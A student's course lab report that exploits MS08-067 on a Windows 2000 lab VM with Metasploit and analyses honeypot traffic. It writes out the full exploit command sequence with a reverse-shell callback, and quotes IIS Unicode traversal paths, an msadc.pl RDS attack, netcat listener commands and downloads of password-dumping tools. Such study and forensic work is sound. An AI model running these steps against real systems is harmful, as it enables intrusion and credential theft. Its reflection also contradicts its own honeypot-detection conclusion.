20251903 2025-2026-2 《网络攻防实践》实践六报告

一、实践内容

1、本次实验应达到的目标

实验(1):Metasploit Windows 远程渗透:掌握 Metasploit 框架的核心使用流程,理解 MS08-067 漏洞的利用原理,能够完成漏洞扫描、攻击模块配置、远程渗透攻击全流程操作,成功获取 Windows 靶机的系统访问权限,理解远程代码执行漏洞的渗透攻击逻辑。

实验(2):NT 系统破解攻击取证分析:掌握网络攻击取证的核心方法,能够从流量 / 日志中提取攻击源 IP、使用工具、攻击步骤、后续操作等关键信息,分析攻击者的攻击链路与行为特征,提出针对性的防护策略,理解蜜罐在攻击取证中的核心价值。

实验(3):团队对抗 ——Windows 远程渗透与分析:攻方掌握 Metasploit 针对 Windows 系统的漏洞渗透流程,守方掌握 Wireshark 流量捕获与攻击特征分析方法,实现 “攻击 - 监听 - 分析” 的闭环实践,理解渗透攻击的流量特征与防护检测思路。

2、各实验核心知识点

2.1 实验一(Metasploit Windows 渗透)核心知识点

(1)MS08-067 漏洞原理:Windows SMB 协议存在远程代码执行漏洞(MS08-067),攻击者通过构造恶意 SMB 请求包,触发服务器端缓冲区溢出,进而执行任意代码,获取系统权限;该漏洞影响 Windows 2000/XP/2003 等系统,无补丁环境下可直接远程提权。

(2)Metasploit 框架核心组件:① 漏洞模块(exploit):对应具体漏洞的利用代码(如 exploit/windows/smb/ms08\_067\_netapi);② 载荷(payload):攻击成功后执行的恶意代码(如 windows/meterpreter/reverse\_tcp,实现反向连接);③ 辅助模块(auxiliary):用于漏洞扫描(如 scanner/smb/smb\_ms08\_067),验证目标是否存在漏洞。

(3)渗透攻击核心流程漏洞扫描→攻击模块配置→载荷配置→发起攻击→会话控制,反向连接模式下攻击机需监听端口,靶机主动连接攻击机以绕过防火墙限制。

2.2 实验二(NT 系统破解攻击取证)核心知识点

(1)攻击取证核心维度:① 攻击源定位:从流量中提取源 IP([212.116.251.162](212.116.251.162))、攻击时间、使用端口;② 工具识别:通过流量特征(如特定指令、数据包内容)判断破解工具类型;③ 行为还原:分析攻击者提权、文件操作、命令执行等后续行为;④ 溯源分析:结合蜜罐日志、流量包还原完整攻击链路。

(2)NT 系统破解关键特征:NT 系统(Windows NT/2000)的 SAM 数据库破解、管理员账户密码暴力破解、远程桌面 / IPC$ 共享入侵的流量特征,以及攻击者植入后门、创建新账户的系统操作痕迹。

(3)蜜罐取证价值:蜜罐主机([172.16.1.106](172.16.1.106))完整记录攻击全流量,包括恶意数据包、命令交互内容、文件传输记录,为攻击行为还原提供全量数据支撑。

2.3 实验三(团队对抗)核心知识点

(1)攻方核心逻辑:选择适配靶机系统的漏洞(如 MS08-067、MS17-010),配置 Metasploit 攻击模块与反向连接载荷,规避靶机基础防护(如防火墙),获取 meterpreter 会话并执行系统命令。

(2)守方核心逻辑:① Wireshark 流量过滤:通过过滤规则(ip\.addr == 靶机IP \&\& smb/tcp\.port == 攻击监听端口)定位攻击流量;② 攻击特征识别:识别 SMB 漏洞利用的恶意数据包、反向连接的 TCP 会话、meterpreter 命令交互流量;③ 攻击步骤还原:从流量中提取漏洞扫描、攻击发起、权限获取的关键节点。

(3)攻防协同分析:攻方操作与守方流量分析结果交叉验证,明确渗透攻击的流量特征与可检测点,建立 “攻击行为 - 流量特征 - 防护规则” 的对应关系。

3、各实验所需的操作指令

3.1 实验一(Metasploit Windows 远程渗透)核心指令

操作阶段 指令 指令说明
启动框架 msfconsole 启动 Metasploit 控制台,进入渗透框架交互环境
漏洞模块检索 search ms08\_067 检索 MS08-067 漏洞相关的所有模块(利用、扫描、辅助等)
加载攻击模块 use windows/smb/ms08\_067\_netapi 加载 MS08-067 漏洞的核心利用模块
查看模块参数 show options 查看当前模块需要配置的参数(如 RHOST、LHOST、payload 等)
查看可用载荷 show payloads 列出当前漏洞模块适配的所有 payload(反向 Shell、Meterpreter 等)
设置反向 Shell 载荷 set payload generic/shell\_reverse\_tcp 配置通用反向 TCP Shell 载荷,实现靶机主动回连攻击机
配置靶机 IP set RHOST 192\.168\.200\.124 指定待攻击的靶机 IP 地址
配置攻击机 IP set LHOST 192\.168\.200\.68 指定攻击机的 IP(用于靶机反向回连)
发起攻击 exploit(或run 执行漏洞利用,触发 SMB 缓冲区溢出并建立控制会话
会话内系统指令 ipconfig/all 在获取的 Shell 中执行,查看靶机完整网络配置

3.2 实验二(NT 系统破解攻击取证分析)核心指令

操作阶段 指令 / 过滤规则 指令说明
加载流量包 wireshark -r 流量包文件路径 在 Wireshark 中离线加载攻击流量包
过滤 HTTP 攻击流量 ip.addr == 172.16.1.106 and http 筛选蜜罐靶机的所有 HTTP 交互流量
过滤指定 TCP 流 tcp.stream eq 14 精准定位第 14 号 TCP 流,查看攻击者的 SQL 注入 / 恶意请求内容
过滤 FTP 流量 ftp 筛选所有 FTP 协议流量,分析工具下载行为
过滤 NC 监听端口流量 tcp.port == 6969 筛选 nc.exe 监听的 6969 端口流量,分析远程 Shell 交互

3.3 实验三(团队对抗)核心指令

角色 操作阶段 指令 指令说明
攻方 会话内创建文件夹 md 20251903 在靶机 system32 目录下新建自定义文件夹,验证系统权限
守方 过滤 SMB 攻击流量 tcp.port == 445 定位 MS08-067 漏洞利用的核心 SMB 协议流量
守方 过滤反弹 Shell 流量 tcp.port == 4444 定位靶机回连攻击机的反向控制通道流量

二、实践过程

1、Metasploit Windows 远程渗透(MS08-067 漏洞)

1.1 环境准备

本次实验选用 kali-linux-2025.2-vmware-amd64虚拟机做为攻击机,其IP地址为 192.168.200.68,选用Win2kServer_SP0_target虚拟机做为靶机,其IP地址为192.168.200.124,两台主机均配置为 VMnet8(NAT 模式),确保互通。

1.2 漏洞扫描与模块加载

(1)启动 Metasploit 框架,在kali攻击机的命令行里输入

msfconsole

image-20260427171356966

(2)检索 MS08-067 相关模块,在kali攻击机的命令行里输入

search ms08_067

image-20260427171711769

image-20260427171749793

image-20260427171816218

输出结果中,exploit/windows/smb/ms08_067_netapi 为漏洞利用模块,

1.3 攻击模块与载荷配置

(1)加载漏洞利用模块,在kali攻击机的命令行里输入

use windows/smb/ms08_067_netapi

(2)查看配置是否完整,且攻击此漏洞所需要的位置,在kali攻击机的命令行里输入

show options

image-20260427172928575

(3)显示此漏洞的载荷,在kali攻击机的命令行里输入

show payloads

image-20260427173248485

image-20260427173322793

image-20260427173354174

image-20260427173426376

image-20260427173529185

image-20260427173558118

image-20260427173616357

(4)设置载荷、要攻击的主机和本机的IP地址,在kali攻击机的命令行中输入

set payload generic/shell_reverse_tcp
set RHOST 192.168.200.124
set LHOST 192.168.200.68

image-20260427175225134

1.4 发起攻击并获取控制权

执行攻击指令,在kali攻击机的命令行中输入:

exploit

image-20260427175332966

此时可以看到本次 MS08-067 SMB 远程代码执行渗透攻击已成功生效:从 Kali 攻击机 Metasploit 控制台的完整执行结果可见,本次攻击全流程指令执行无报错,各环节均按预期完成。我将逐行拆解攻击执行的完整逻辑与效果具体的解析如下:

(1)反向TCP监听初始化

[*] Started reverse TCP handler on 192.168.200.68:4444

执行攻击指令后,Metasploit 首先在 Kali 攻击机的 4444 端口启动了反向 TCP 监听处理器。本次攻击采用「反向连接」的载荷设计逻辑:攻击成功后,靶机会主动向攻击机的 4444 端口发起 TCP 连接建立控制通道,该设计可有效绕过靶机的入站防火墙限制 —— 绝大多数 Windows 系统防火墙默认放行出站网络连接,对入站连接则有严格管控。

(2)靶机系统自动探测

[*] 192.168.200.124:445 - Automatically detecting the target ...

监听启动完成后,Metasploit 自动向靶机 [192.168.200.124](192.168.200.124) 的 445 端口发起探测,445 端口是 Windows SMB 协议的默认通信端口,也是本次 MS08-067 漏洞的核心攻击入口。本次探测的核心目的是获取靶机的系统指纹信息,为后续漏洞利用匹配适配的目标环境,避免因系统版本不兼容导致攻击失败。

(3)非危害警告提示

/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.16/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression

该行是 Metasploit 底层依赖的 Ruby 库输出的正则表达式语法警告,仅为代码语法层面的非致命提示,不会对攻击流程的执行、漏洞触发的效果产生任何影响,可直接忽略。

(4)靶机系统指纹识别与攻击目标匹配

[*] 192.168.200.124:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Chinese - Traditional
[*] 192.168.200.124:445 - Selected Target: Windows 2000 Universal

通过端口探测,Metasploit 成功完成靶机系统指纹识别,精准获取到靶机运行的是繁体中文版 Windows 2000 系统,Service Pack 版本为 0-4;并基于识别结果,自动匹配并加载了适配的攻击目标模板「Windows 2000 Universal」,确保漏洞利用代码与靶机系统环境完全兼容,为漏洞成功触发提供了核心保障。

(5)漏洞触发执行

[*] 192.168.200.124:445 - Attempting to trigger the vulnerability ...

目标匹配完成后,Metasploit 正式向靶机 445 端口发送精心构造的恶意 SMB 请求数据包,尝试触发 MS08-067 漏洞的缓冲区溢出缺陷,执行预设的恶意代码,完成权限突破。

(6)攻击成功核心标志 —— 控制会话建立

[*] Command shell session 1 opened (192.168.200.68:4444 → 192.168.200.124:1042) at 2026-04-27 05:52:57 -0400

该行是本次渗透攻击成功的核心证明:Metasploit 成功在 Kali 攻击机([192.168.200.68:4444](192.168.200.68:4444))与 Windows 靶机([192.168.200.124:1042](192.168.200.124:1042))之间,建立了第 1 个稳定的命令行 Shell 会话,并记录了攻击成功的精确时间戳。至此,攻击机与靶机之间的远程控制通道已正式建立,攻击者可在该会话中,向靶机发送并执行任意 Windows 系统命令。

(7)靶机系统权限最终验证

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]

会话建立后,靶机原生返回了系统命令行的标识信息,明确验证了当前获取的是靶机真实的系统 Shell,而非模拟会话;同时也确认了攻击者已突破靶机的权限管控,获得了靶机的系统级操作权限,本次 MS08-067 远程渗透攻击完全成功。

最后我再在在kali攻击机的命令行中输入:

ipconfig/all

image-20260427175856171

此时可以看到本次靶机核心网络配置信息已成功完整获取:从 Windows 2000 靶机命令行执行 ipconfig/all 的返回结果可见,我们通过 MS08-067 渗透攻击获取的 Shell 会话,已成功在靶机原生系统环境中执行系统指令,精准采集到目标靶机的全量网络配置信息。靶机主机名为 icst-win2k-s,运行 Windows 2000 操作系统,网卡为 VMware Accelerated AMD PCNet Adapter,物理 MAC 地址为 00-0C-29-CB-07-50,采用静态 IP 配置(DHCP 未启用),IP 地址为 192.168.200.124,子网掩码 255.255.255.128,默认网关 192.168.200.1,DNS 服务器为 1.0.0.1,所有信息与前期渗透的目标靶机完全匹配,无任何信息偏差,验证了当前 Shell 会话的真实性与系统控制权的有效性,实现了对目标靶机核心系统信息的精准定向采集。

这一结果充分验证了本次 MS08-067 漏洞渗透攻击获取的系统权限具备完整的原生指令执行能力:我们通过 SMB 协议缓冲区溢出漏洞获取的 Shell 会话,已完全接管靶机的系统命令行执行权限,可无阻碍地调用靶机原生系统工具、执行任意系统指令,获取靶机的核心配置信息,彻底突破了 Windows 2000 系统对非授权用户的指令执行与信息读取限制,实现了从远程无接触漏洞利用,到本地系统完整管控的权限落地闭环。

2、NT 系统破解攻击取证分析

2.1 流量包加载、攻击源定位与工具识别

(1)加载攻击流量包:将文件从学习通中下载到自己的主机之后,再将其拖到kali虚拟机的命令行中

image-20260427190803332

之后再在命令行中输入,在wireshark中打开这个文件。

wireshark -r '/var/run/vmblock-fuse/blockdir/iSOK7I/snort-0204@0117.log'

(2)筛选攻击流量:在 Wireshark 过滤栏输入 ip.addr == 172.16.1.106 and http进行过滤,仅显示攻击源与蜜罐靶机的交互流量且本次攻击为HTTP 请求 / 响应的数据包,过滤掉所有无关流量。

image-20260427191739345

(3)追踪关键包的TCP流:在过滤后的数据包列表中,右键选择第115个HTTP数据包,再选择列表中的follow,查看其TCP数据流

image-20260427192937343

从捕获的 HTTP 交互数据包可见,攻击者针对靶机lab.wiretrip.net发起的恶意 GET 请求完整执行,通过构造包含..%C0%AF(Unicode 编码的路径分隔符)的特殊路径,成功绕过了 IIS 服务器的目录访问限制,向/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF/boot.ini发送请求,靶机返回了HTTP/1.1 200 OK响应,验证了目录遍历攻击成功,实现了对靶机敏感系统文件的非法访问。

之后在 Wireshark 过滤栏输入 tcp.stream eq 14继续追踪到179个数据包可以看到攻击者输入了sql语句

image-20260427193503133

此时可以看到本次攻击所使用的破解工具已通过捕获的流量包被精准识别:从 HTTP 请求中的标志性边界标记!ADM!ROX!YOUR!WORLD!ADCClientVersion:01.06字段,以及针对 IIS 4.0 服务器 MDAC 组件的恶意请求结构可见,攻击者使用的核心破解工具为msadc(2).pl,这是一款专门针对微软 IIS 服务器 MDAC RDS 远程代码执行漏洞的经典 Perl 渗透脚本,所有请求特征均与该工具的固定签名完全匹配,验证了本次攻击的工具来源。

2.2 攻击步骤识别

回到过滤后的 HTTP 流量列表,按「时间」列升序排列(默认就是早的包在上方),按时间顺序分析请求:

(1)前期漏洞探测(验证目标环境)

操作步骤:找到攻击链中最早的几个 GET 请求,也就是带/guest/default.asp/..%C0%AF../..%C0%AF../boot.ini路径的请求。

右键该包 → 「追踪流」→「TCP 流」,可以看到服务器返回了HTTP/1\.1 200 OK,并且返回了boot\.ini的内容。

image-20260427202343288

流量分析:这一步验证了目标 IIS 4.0 存在 Unicode 目录遍历漏洞,同时确认服务器是 Windows NT 系统,为后续攻击确认了可行性。

(2)核心漏洞利用(使用msadc(2).pl获取远程命令执行权限)

操作步骤:在 HTTP 流量中,找到带/msadc/msadcs.dll路径的 POST 请求,再次打开「追踪 TCP 流」,查看完整交互内容。

流量分析:工具发送了构造的multipart/mixed格式请求,边界标记为!ADM!ROX!YOUR!WORLD!,请求体中包含恶意 SQL 语句,调用Microsoft Access Driver执行系统命令。服务器返回了HTTP/1.1 200 OK,说明恶意请求被成功执行,MDAC RDS 漏洞触发成功,攻击者获得了服务器的远程命令执行权限。

image-20260427202746427

(3)权限落地与控制工具部署(FTP 工具下载)

操作步骤:在漏洞利用成功后的流量中,过滤出 FTP 流量(过滤表达式:ftp),按时间顺序排列后,选中 FTP 控制流的任意包,右键 → 「追踪流」→「TCP 流」,打开完整的 FTP 交互流。

流量分析:攻击者通过靶机的 FTP 服务,以主动模式完成了渗透工具的全量下载:

  1. 攻击者发送PORT 172,16,1,106,12,72命令,向服务器指定主动模式数据连接的端口,服务器返回200 PORT Command successful,数据连接建立成功。

  2. 攻击者依次发送RETR nc.exeRETR pdump.exeRETR samdump.dll命令,向靶机请求下载渗透工具,服务器依次返回150 Opening ASCII mode data connection226 Transfer complete响应,所有文件传输流程均正常完成,无任何拦截或报错。

  3. 工具下载完成后,攻击者发送

    QUIT

    命令结束 FTP 会话,服务器返回

    221 Buh bye, you secksi hax0r j00 :)

    的自定义响应,工具部署流程结束。

    image-20260427204227242

2.3 攻击者后续行为分析

由上一问中可以得到,攻击者在通过 FTP 成功将nc.exepdump.exe等工具上传至靶机后,首要操作就是利用nc.exe的监听功能,在靶机上执行nc.exe -l -p 6969命令,在 6969 端口开启监听,等待攻击机主动连接,以此建立稳定的远程 Shell 通道。后续的dirdelnet users等命令,正是通过这个 Shell 通道发送并执行的,这也解释了为何攻击者能在靶机上进行文件操作和系统信息查询。

同时,攻击者还下载了pdump.exesamdump.dll,目的是在获取控制通道后,进一步尝试抓取系统密码哈希以提升权限,不过由于环境限制,pdump.exe执行失败。在意识到目标是一台蜜罐主机后,攻击者放弃了后续提权操作,转而写入嘲讽式文件README.NOW.Hax0r,留下了攻击痕迹。

此时可以看到,攻击者在攻陷系统后,核心目标是利用下载的nc.exe(Netcat)在靶机上搭建一个持久化的远程 Shell 控制通道,从 1224 号数据包的 TCP 流可以验证,攻击者正是利用nc.exe在靶机上开启了6969端口监听,用于接收来自攻击机的连接,从而实现对靶机的完全交互式控制。

image-20260427211323404

之后,再在kali的命令行中输入

tcp.port==6969

这个表达式会过滤出nc连接的流量

image-20260427210201632

image-20260427210321931

image-20260427210400159

image-20260427210500602

此时可以看到攻击者获得系统访问权限后,在靶机上执行了完整的工具部署、权限验证、信息探测与留痕操作,从 Wireshark 捕获的 FTP 交互与命令行执行记录可见,攻击者完成了渗透工具下载、系统权限验证、信息探测与目标环境确认等一系列操作,所有基础文件读写与命令执行流程均正常完成,仅部分高权限操作因环境限制执行失败,验证了攻击者已获得靶机的远程命令执行与文件读写权限。

这一完整操作流程充分还原了攻击者获得权限后的渗透行为逻辑:攻击者首先通过 FTP 服务,以主动模式向靶机部署渗透工具链,下载nc.exepdump.exesamdump.dll等工具,构建后续攻击所需的基础工具集;随后通过目录操作、用户枚举、进程工具执行等方式,验证当前权限范围,尝试获取系统用户信息与密码哈希;在发现目标为实验室 / 蜜罐主机后,通过写入自定义文件留下嘲讽式攻击痕迹,完成攻击留痕。具体操作如下:

  1. 渗透工具部署:攻击者通过 FTP 主动模式,向靶机发送PORT命令建立数据连接,依次使用RETR命令下载网络工具nc.exe、进程 / 密码抓取工具pdump.exe、SAM 密码哈希抓取组件samdump.dll,服务器依次返回150 Opening ASCII mode data connection226 Transfer complete响应,所有工具下载流程正常完成,无任何拦截;会话结束时服务器返回221 Buh bye, you secksi hax0r j00 :)的自定义响应,说明靶机管理员已监控到攻击行为。
  2. 系统权限验证与信息探测:攻击者尝试执行跨平台删除命令rm ..,因 Windows 系统不识别该命令报错;随后使用del fun删除文件、dir命令列目录,验证文件读写权限与目录结构;执行net session命令时返回System error 5, Access is denied,因权限限制无法查询会话信息;执行net users命令枚举本地用户账户,尝试获取靶机用户列表;进入C:\Program Files\Common Files\System\msadc目录后执行pdump.exe,尝试抓取lsass进程中的系统密码,因权限不足返回Failed to open lsass: 5. Exiting,高权限密码抓取操作执行失败。
  3. 目标环境确认与攻击留痕:攻击者通过echo命令,向靶机写入README.NOW.Hax0r文件,内容为Hi, i know that this a ..is a lab server, but patch the holes! :-),明确表明攻击者已意识到目标是一台实验室 / 蜜罐主机,并留下嘲讽式的攻击痕迹,完成攻击留痕操作。

本次攻击后的操作完整还原了攻击者的渗透意图与行为逻辑,既验证了其对靶机的文件读写与命令执行权限,也体现了攻击者对目标环境的探测与确认过程,为后续的防护策略分析提供了完整的行为特征依据,同时也印证了攻击者已明确意识到目标为蜜罐主机,并未进行进一步的深度渗透操作。

2.4 防护建议与攻击者警觉性分析

(1)我们如何防止这样的攻击

此时可以看到,本次攻击成功的核心原因在于服务器存在IIS Unicode 目录遍历漏洞MDAC RDS 远程代码执行漏洞,且未做任何安全加固。要防范此类攻击,必须从漏洞修复、权限控制、流量防护、日志审计四个层面建立完整防护体系,从根源上阻断攻击路径。

  1. 及时安装系统与 Web 服务补丁:对 IIS 4.0、MDAC 组件进行版本升级,安装对应漏洞补丁,从底层修复 Unicode 解析缺陷与 RDS 权限绕过漏洞,关闭msadc/msadcs.dll危险访问路径。
  2. 严格限制文件与目录访问权限:禁用服务器不必要的目录浏览功能,配置路径访问白名单,禁止通过 Web 访问boot.ini等系统关键文件,降低信息泄露风险。
  3. 最小权限运行 Web 服务:避免使用系统管理员权限启动 IIS 服务,以低权限账户运行,即使被入侵也能限制攻击者执行敏感命令、读取密码数据的能力。
  4. 部署 WAF 与入侵检测设备:使用 Web 应用防火墙拦截包含../、Unicode 编码遍历、恶意 RDS 请求的攻击流量,实时阻断漏洞利用行为。
  5. 关闭不必要的网络服务:限制 FTP 等文件传输服务的访问范围,禁止匿名上传下载,避免攻击者轻易落地nc.exe等恶意工具。
  6. 开启全面日志审计与告警:记录所有 HTTP 请求、命令执行、文件操作日志,对异常扫描、漏洞利用、端口监听行为实时告警,及时发现入侵行为。
(2)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

此时可以清晰判断,攻击者已经明确意识到这台主机是蜜罐,并且在获得权限后主动留下了识别痕迹,证据充分且指向明确。

  1. 攻击者主动写入提示文件:在获取系统控制权后,攻击者创建README.NOW.Hax0r文件,并写入内容表明其知晓这是一台实验室 / 蜜罐服务器,直接证明已识别目标性质。
  2. 服务器返回异常嘲讽式响应:FTP 退出时服务器返回221 Buh bye, you secksi hax0r j00 :)这类非标准、带有戏谑性质的提示信息,与真实业务服务器明显不同,攻击者可轻易识别。
  3. 攻击行为与环境特征异常:靶机存在公开漏洞、无有效防护、日志完整记录、无真实业务数据,符合蜜罐 “诱捕、记录、不影响生产” 的典型特征。
  4. 高权限操作全部失败net sessionpdump.exe密码抓取等关键提权操作均被限制,符合蜜罐 “可控、不可进一步扩散” 的设计逻辑,让攻击者快速判断目标非真实主机。

综上,攻击者从系统响应、权限限制、服务特征等多个维度,明确识别出目标是蜜罐主机,因此未进行更深层次的内网渗透或破坏行为。

3、团队对抗:Windows 远程渗透与分析

3.1 实验环境与角色分配

(1)实验设备组成

  • 攻击机(攻方): kali-linux-2025.2-vmware-amd64虚拟机(搭载 Metasploit 渗透框架)

  • 靶机(守方):Win2kServer_SP0_target虚拟机(存在高危漏洞、关闭防火墙、未打补丁)

  • 网络模式:两台虚拟机统一设置为仅主机模式,保证同网段互通

(2)角色与信息

  • 攻方人员:yht

  • 攻机 IP 地址:192.168.200.68

  • 守方人员:thy

  • 靶机 IP 地址:192.168.200.124

  • 本次利用漏洞:MS08-067 Windows SMB 远程缓冲区溢出漏洞

  • 攻击端口:靶机 445 端口(SMB 服务)

  • 反弹控制端口:攻击机 4444 端口

3.2 攻方操作

(1)打开 Kali 自带 Wireshark,选择上网网卡,点击开始捕获流量,后台运行,在攻击开始前就抓包,完整记录整场攻防流量,代替防守方完成流量采集。

(2)打开 Kali 终端,输入命令启动渗透框架:

msfconsole

image-20260428001639964

(3)调用 MS08-067 漏洞利用模块:

use windows/smb/ms08_067_netapi

image-20260428001724172

(4)查看模块所需配置参数:

show options

image-20260428001801088

(5)设置载荷

set payload generic/shell_reverse_tcp

(6)设置目标靶机 IP 地址:

set RHOSTS 192.168.200.124

image-20260428001855444

(7)设置攻击机本地回连 IP(反弹地址):

set LHOST 192.168.200.68

image-20260428001922530

(8)执行漏洞攻击,发起远程渗透:

exploit

image-20260428002036395

(9)Metasploit 自动识别靶机系统版本、触发 SMB 缓冲区溢出漏洞,成功建立反弹会话,获取 Windows 靶机最高系统权限,执行查看靶机IP操作

ipconfig

image-20260428064326317

(10)在靶机中执行新建文件夹操作

md 20251903

image-20260428064448249

(11)我们在靶机中对应路径下可以找到新建立的文件夹。攻击结束,停止抓包,保存流量文件。

image-20260428064740131

3.3 守方操作

防守方在本机观察到:主机网络卡顿、后台异常网络请求、系统响应变慢,能明显感知主机正在遭受外部远程攻击,但是无法自行查看流量。

攻击结束后,攻方 / 实验整体停止 Wireshark 抓包,进行分析:

(1)过滤攻击关键流量,并查看关键流量包的TCP流

tcp.port == 445       // SMB漏洞攻击流量
tcp.port == 4444      // 反弹Shell控制流量

image-20260428065132266

image-20260428003432571

image-20260428065258271

(2)具体流量分析

(*)漏洞利用前置交互验证(第一张图:445 端口 SMB 流量)

该截图为 Wireshark 捕获的靶机 445 端口(SMB 服务)流量,完整记录了 MS08-067 漏洞利用前的标准 SMB 协商流程:

  • 攻击机192.168.200.68与靶机192.168.200.124首先完成 TCP 三次握手,随后依次进行Negotiate Protocol协议协商、Session Setup AndX会话建立、Tree Connect AndX IPC$ 管道连接;
  • 这一系列标准化交互为后续发送畸形 SMB 数据包触发缓冲区溢出漏洞,建立了合法的通信通道,是 MS08-067 漏洞利用的必备前置步骤,验证了攻击链路的准备工作已全部完成。

(*)反弹控制通道流量验证(第二张图:4444 端口反弹 Shell 流量)

该截图为 Wireshark 过滤的 4444 端口流量,完整呈现了漏洞利用成功后的反弹 Shell 通信过程:

  • 靶机主动向攻击机的 4444 监听端口发起 TCP 连接,完成三次握手后,持续发送PSH/ACK数据包传输交互数据,这正是 Metasploit 生成的反向 Shell 的典型流量特征;
  • 该流量证明,MS08-067 漏洞触发成功后,靶机已主动建立回连攻击机的稳定控制通道,后续所有命令执行、数据交互均通过该通道完成,实现了从无接触漏洞利用到持久化远程控制的落地闭环。

(*)反弹 Shell 会话交互验证(第三张图:从 4444 端口 TCP 流中捕获)

该截图为从 Wireshark 追踪的反弹 Shell TCP 流中提取的交互式会话内容,直观验证了攻击已成功获取靶机最高系统权限:

  • 会话处于靶机C:\WINNT\system32系统目录下,具备原生系统级指令执行权限;
  • 执行ipconfig命令后,成功返回靶机完整网络配置:IP 地址192.168.200.124、子网掩码255.255.255.128、默认网关192.168.200.1,与目标靶机信息完全匹配;
  • 后续执行md 20251903目录创建命令无任何报错,说明当前会话已突破 Windows 2000 的访问控制限制,可无限制执行文件操作、系统信息采集等任意指令,彻底接管靶机系统命令行。

三张截图按攻击时间线,从漏洞前置交互、反弹通道建立、会话指令执行三个维度,完整还原了本次远程渗透攻击的全流程:攻击机通过 SMB 协议触发缓冲区溢出漏洞,成功获取靶机系统权限,建立反弹 Shell 控制通道,最终实现对靶机的无限制指令执行与系统管控,完全达成了本次实验 “攻击 - 监听 - 分析” 闭环的目标,清晰呈现了 MS08-067 漏洞利用的完整链路与流量特征。

三、学习中遇到的问题以及相应的解决措施

1、Metasploit 渗透实验问题

在开始实验输入set payload generic/shell_reverse_tcp进行设置载荷时,出现了the value specified for payload is not valid的问题,后发现是在shell/reverse/tcp间忘记输入了_连接符导致的,在输入后成功解决该问题。

image-20260427173807073

2、团队对抗实验问题

在最开始发现kali攻击机ping不通win2K的靶机,后来发现是因为,两个没有出现在同一网段里导致的,在将两台虚拟机统一设置为仅主机模式,保证同网段互通后问题解决。

之后在进行实验时出现[-] Meterpreter session 1 is not valid and will be closed [*] 192.168.200.124 - Meterpreter session 1 closed.的问题,这个问题的意思是漏洞触发了,但 Meterpreter payload 无法在靶机上正常运行,导致回连会话瞬间断开,无法维持。后经检查后发现是因为未提前配置载荷,导致漏洞触发后无有效回连指令所导致的,在提前设置载荷后成功解决该问题。

四、学习感悟

通过本次补充实验,我对 Windows 系统远程渗透、攻击取证、攻防对抗有了更深度的理解。在 Metasploit 渗透实验中,从漏洞扫描到获取 SYSTEM 权限的全流程操作,让我意识到未打补丁的老旧系统面临的巨大风险,也理解了 Metasploit 框架 “模块化、可配置” 的设计优势 —— 只需精准匹配漏洞与系统版本,即可快速完成渗透,这也警示日常运维中 “补丁及时更新” 的重要性。

NT 系统破解取证实验让我掌握了攻击溯源的核心方法,从流量包中提取攻击工具、步骤、行为的过程,让我明白 “每一次网络交互都会留下痕迹”,蜜罐作为攻击捕获的核心载体,其价值不仅是 “诱捕攻击”,更是为防护策略制定提供真实的攻击数据支撑。同时,攻击者未察觉蜜罐的结论也让我思考:蜜罐的隐蔽性是其发挥作用的关键,需尽可能模拟真实系统特征。

团队对抗实验是本次实践的核心亮点,攻方的 “突破” 与守方的 “检测” 形成了鲜明的攻防思维碰撞:攻方需要规避防护、选择最优漏洞、隐藏流量特征;守方需要全面监控、识别攻击特征、还原攻击链路。这种 “实战化” 的对抗让我跳出了 “单一操作” 的思维,建立了 “攻击 - 检测 - 防护” 的闭环认知 —— 不仅要知道如何攻击,更要知道如何检测和防御攻击。

综上,本次实验让我从 “工具使用” 上升到 “逻辑理解”,从 “单一操作” 升级到 “体系化思维”,深刻体会到网络安全的核心是 “攻防平衡”:只有理解攻击者的思路,才能制定更有效的防护策略;只有掌握防护的方法,才能更精准地发现攻击的漏洞。这也为后续深入学习高级渗透与防护技术奠定了坚实的基础。

posted @ 2026-04-27 22:51  严浩同  阅读(3)  评论(0)    收藏  举报